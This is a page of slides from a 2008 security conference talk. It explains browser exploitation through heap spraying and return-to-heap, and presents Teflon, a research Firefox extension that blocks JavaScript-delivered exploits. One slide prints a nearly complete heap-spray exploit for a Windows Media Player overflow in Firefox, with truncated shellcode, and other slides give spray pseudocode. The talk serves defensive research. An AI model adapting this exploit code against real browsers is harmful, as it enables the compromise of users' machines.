Teflon - Anti Stick for the browser attack surface

2,450 views
2,306 views

Published on

My presentation on browser exploitation and defense, at BA-Con 08, Buenos Aires.

0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
2,450
On SlideShare
0
From Embeds
0
Number of Embeds
27
Actions
Shares
0
Downloads
0
Comments
0
Likes
2
Embeds 0
No embeds

No notes for slide

Teflon - Anti Stick for the browser attack surface

  1. 1. Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface BA-Con 2008 – Buenos Aires
  2. 2. <ul><li>Saumil Shah </li></ul><ul><ul><li>ceo, net-square solutions </li></ul></ul><ul><ul><li>[email_address] </li></ul></ul><ul><ul><li>dojo sensei: &quot;The Exploit Laboratory&quot; </li></ul></ul><ul><ul><li>author: &quot;Web Hacking - Attacks and Defense&quot; </li></ul></ul># who am i # who am i 16:08 up 4:26, 1 user, load averages: 0.28 0.40 0.33 USER TTY FROM LOGIN@ IDLE WHAT saumil console - 11:43 0:05 bash
  3. 3. Web 2.0's attack surface <ul><li>It's all about the browser. </li></ul><ul><li>The browser is the desktop of tomorrow... </li></ul><ul><li>...and as secure as the desktop of the 90s. </li></ul><ul><li>The most fertile target area for exploitation. </li></ul><ul><li>What do today's browsers look like? </li></ul>
  4. 4. Today's average browser
  5. 5. Browser Architecture DOM HTML+CSS Javascript
  6. 6. Browser Architecture DOM HTML+CSS Javascript user loaded content <img> <iframe> <script> <object> <div> <style> <embed> <span> <table> <form> <input> ... etc.
  7. 7. Browser Architecture DOM HTML+CSS Javascript user loaded content <img> <iframe> <script> <object> <div> <style> <embed> <span> <table> <form> <input> ... etc. Ajax libs Ajax/rich apps
  8. 8. The Browser is Desktop 2.0 &quot;Same Same But Different&quot;
  9. 9. The Browser – Kernel analogy DOM HTML+CSS Javascript user loaded content Ajax libs Ajax/rich apps Kernel System Call libs Userland programs LibC C Runtime Browser OS =
  10. 10. The Browser – Kernel analogy HTML+CSS Javascript user loaded content Ajax libs Ajax/rich apps System Call libs Userland programs LibC C Runtime Browser Core Kernel DOM Kernel =
  11. 11. The Browser – Kernel analogy DOM HTML+CSS Javascript user loaded content Ajax libs Ajax/rich apps Kernel System Call libs Userland programs LibC C Runtime Plugin / Extensions Drivers =
  12. 12. The Browser – Kernel analogy DOM HTML+CSS Javascript Ajax libs Ajax/rich apps Kernel System Call libs LibC C Runtime HTML / DHTML / JS Userland code <H1>hello world</H1> <script>alert('hi');</script> printf(&quot;Hello World &quot;); =
  13. 13. The Browser – Kernel analogy DOM Ajax libs Ajax/rich apps Kernel LibC C Runtime <object>, <embed> syscalls <object clsid=&quot;XX-YYY-ZZ&quot;> <embed src=&quot;file.mp4&quot;> System Call libs exec(&quot;program.bin&quot;); open(&quot;file.mp4&quot;); =
  14. 14. The Browser – Kernel analogy DOM Ajax libs Ajax/rich apps Kernel LibC C Runtime XHR Sockets xhr = new XMLHttpRequest() System Call libs s = socket(); =
  15. 15. Browser &quot;syscalls&quot; HTML Loaded DOM Javascript HTML
  16. 16. Browser &quot;syscalls&quot; HTML document.write(&quot;<object CLSID=XXX-XXXX-XXX>&quot;); DOM Javascript
  17. 17. Browser &quot;syscalls&quot; document.write(&quot;<object CLSID=XXX-XXXX-XXX>&quot;); Javascript HTML DOM
  18. 18. Exploiting a browser <ul><li>Built-in interpreted language – Javascript. </li></ul><ul><li>Craft the exploit locally, via JS. </li></ul><ul><li>Pre-load the process memory exactly as you like, thanks to HTML and JS. </li></ul><ul><li>Buffer overflows in browsers or components. </li></ul><ul><li>Practical exploitation – Return to heap. </li></ul>
  19. 19. Exploiting a browser <ul><li>ASLR, DEP, NX, GS, Return to stack, Return to shared lib, ... doesn't bother us. </li></ul><ul><li>Spraying the heap, and then jumping into it. </li></ul><ul><li>Map the memory just-in-time. </li></ul><ul><li>Pioneered by Skylined. </li></ul><ul><li>&quot;Heap Feng Shui&quot; by Alexander Sotirov. </li></ul>
  20. 20. Heap Spraying NOP sled shellcode NOP sled shellcode NOP sled shellcode <script> : spray = build_large_nopsled(); a = new Array(); for(i = 0; i < 100; i++) a[i] = spray + shellcode; : </script> <html> : exploit trigger condition goes here : </html> a[7] a[8] a[9]
  21. 21. How it all works stack heap code and stuff 0xFFFFFFFF 0x00000000 ret EIP ret EIP frames on the stack var1 var3 var2 var4 overflow in var 3
  22. 22. The Heap...sprayed stack code and stuff 0xFFFFFFFF 0x00000000 ret EIP ret EIP var1 var3 var2 var4 overflow in var 3 <script> : for(i = 0; i < 50; i++) a[i] = nops + shellcode; : </script> part of the heap gets &quot;sprayed&quot;
  23. 23. Return to Heap stack code and stuff 0xFFFFFFFF 0x00000000 ret EIP ret EIP var1 var3 var2 var4 overwrite saved EIP AAAAAAAAAAAAAAAAAAAAAAAAAA heapaddr <object clsid=XXXXXXXX> exploit trigger in HTML code
  24. 24. Return to Heap stack code and stuff 0xFFFFFFFF 0x00000000 ret EIP ret EIP var1 var3 var2 var4 AAAAAAAAAAAAAAAAAAAAAAAAAA heapaddr Hit one of the many sprayed blocks.
  25. 25. Demo <ul><li>Step by step – building an exploit. </li></ul><ul><li>Firefox + Windows Media Player. </li></ul><ul><li>IE7 LinkedIn Toolbar. </li></ul>
  26. 26. Exploits delivered by Javascript <ul><li>Build up the exploit on-the-fly. </li></ul><ul><li>and delivered locally. </li></ul><ul><li>Super obfuscated. </li></ul><ul><li>Randomly encoded each time. </li></ul><ul><li>&quot;Signature that!&quot; </li></ul>
  27. 27. Browser defense <ul><li>Dynamic exploitation. </li></ul><ul><ul><li>Nothing blows up until the last piece of the puzzle fits. </li></ul></ul><ul><ul><li>Unless you are &quot;in&quot; the browser, you'll never know. </li></ul></ul><ul><li>Anti-Virus quack remedies. </li></ul>
  28. 28. Effectiveness of Anti-Virus software <ul><li>Makes computers sluggish. </li></ul><ul><li>False alarms. </li></ul><ul><li>&quot;Most popular brands have an 80% miss rate&quot; – AusCERT. </li></ul><ul><li>Heuristic recognition fell from 40-50% (2006) to 20-30% (2007) – HeiseOnline. </li></ul><ul><li>Signature based scanning does not work. </li></ul><ul><li>A-I techniques can be easily beaten. </li></ul>
  29. 29. New directions of R&D <ul><li>NoScript extension. </li></ul><ul><ul><li>slightly better than &quot;turn off JS for everything&quot;. </li></ul></ul><ul><ul><li>default deny, selected allow approach. </li></ul></ul><ul><ul><li>Per site basis – list building exercise. </li></ul></ul><ul><li>Analysis through Spidermonkey. </li></ul><ul><ul><li>Roots in understanding obfuscated malware. </li></ul></ul>
  30. 30. New directions of R&D <ul><li>Hooking into the JS engine via debuggers. </li></ul><ul><ul><ul><li>http://securitylabs.websense.com/content/Blogs/2802.aspx </li></ul></ul></ul>
  31. 31. Teflon <ul><li>An attempt to protect browsers against JS encoded exploits. </li></ul><ul><li>Doesn't allow anything to stick. </li></ul><ul><li>Per-site JS disabling is too drastic. </li></ul><ul><ul><li>or for that matter whitelisting/blacklisting. </li></ul></ul><ul><ul><li>I hate maintaining lists. </li></ul></ul><ul><li>Are you sure facebook won't deliver malware tomorrow? </li></ul>
  32. 32. Teflon - objectives <ul><li>Deep inspection of payload. </li></ul><ul><li>Just block the offensive vectors. </li></ul><ul><ul><li>define offensive. </li></ul></ul><ul><ul><li>allow the rest. </li></ul></ul><ul><li>No need to disable JS. </li></ul><ul><ul><li>...just prevent the browser &quot;syscalls&quot;. </li></ul></ul><ul><li>Implemented as a browser extension. </li></ul><ul><li>Ideally this technology should be part of the browser's &quot;kernel&quot;. </li></ul>
  33. 33. Teflon 0.2 <ul><li>Firefox 1.5-2.0 implementation. </li></ul><ul><li>Modifications to the DOM. </li></ul><ul><ul><li>document.write, innerHTML, eval, etc. </li></ul></ul><ul><li>Takes care of recursive javascript obfuscation. </li></ul><ul><li>Replaces offensive vectors with <div>s. </li></ul>
  34. 34. Teflon 0.2 – lab tests <ul><li>Firefox+Windows Media Player (MS06-006) </li></ul><ul><li>http://milw0rm.com/exploits/1505 </li></ul><ul><li>Bare exploit - The Exploit Lab style! </li></ul><ul><li>Packed with /packer/ </li></ul><ul><ul><li>http://dean.edwards.name/packer/ </li></ul></ul><ul><li>Scriptasylum JS encoder/decoder </li></ul><ul><ul><li>http://scriptasylum.com/tutorials/encdec/encode-decode.html </li></ul></ul><ul><li>Both packer+encoder together. </li></ul>
  35. 35. Plain vanilla exploit <script> // calc.exe var shellcode = unescape(&quot;%ue8fc%u0044%u0000%u458b....... ......%u6c61%u2e63%u7865%u2065%u0000&quot;); // heap spray var spray = unescape(&quot;%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090&quot;); do { spray += spray; } while(spray.length < 0xc0000); memory = new Array(); for(i = 0; i < 50; i++) memory[i] = spray + shellcode; // we need approx 2200 A's to blow the buffer buf = &quot;&quot;; for(i = 0; i < 550; i++) buf += unescape(&quot;%05%05%05%05&quot;); buf += &quot;.wmv&quot;; document.write('<embed src=&quot;' + buf + '&quot;></embed>'); </script>
  36. 36. /packer/
  37. 37. Scriptasylum encoder/decoder
  38. 38. Demo <ul><li>Teflon against plain vanilla exploit. </li></ul><ul><li>Teflon against /packer/. </li></ul><ul><li>Teflon against JS encoder. </li></ul><ul><li>Teflon against packer+encoder. </li></ul>
  39. 39. Teflon 0.2 – in the wild <ul><li>Tested against www.cuteqq.cn malware. </li></ul><ul><li>Encrypted and randomized JS delivery. </li></ul><ul><li>MS07004 – IE VML bug. </li></ul>
  40. 40. Without Teflon – 0wned
  41. 41. Without Teflon – 0wned
  42. 42. With Teflon – harmless div
  43. 43. With Teflon – harmless div
  44. 44. Teflon – practical deployment <ul><li>Right now, it is just a research prototype. </li></ul><ul><li>How shall we use it in practice? </li></ul><ul><li>Web servers can publish a &quot;manifest&quot; of what is allowed (or denied). </li></ul><ul><ul><li>e.g. &quot;My web pages should never contain OBJECTs or EMBEDs&quot; </li></ul></ul><ul><ul><li>or: &quot;Only CLSID xyz is allowed&quot; </li></ul></ul><ul><ul><li>maybe like P3P? (we all know where that went) </li></ul></ul>
  45. 45. Teflon 0.2 - Limitations <ul><li>Javascript is too powerful (read dangerous). </li></ul><ul><li>&quot;I was here first!&quot; approach. </li></ul><ul><li>Teflon really needs to be built right into the browser. </li></ul>
  46. 46. Where are browsers headed? <ul><li>Let's mash-up EVERYTHING. </li></ul><ul><li>Standards driven by bloggers and Twits. </li></ul><ul><li>We need a standard, granular security model for browsers – built in. </li></ul><ul><li>Web servers, app frameworks need to play a role too. </li></ul>javascript is everything WebSlices - WTF finally getting a decent UI totally on ACID fugly little snitch
  47. 47. Future R&D directions <ul><li>Can we detect heap sprays? </li></ul><ul><li>Non-executable heap? it does exist... </li></ul><ul><li>Signed Javascript, JARs? </li></ul><ul><li>Browser &quot;syscall&quot; protection. </li></ul><ul><li>Weren't Java applets supposed to be perfect? :-) </li></ul>
  48. 48. [email_address] Thank you BA-Con 2008 – Buenos Aires

×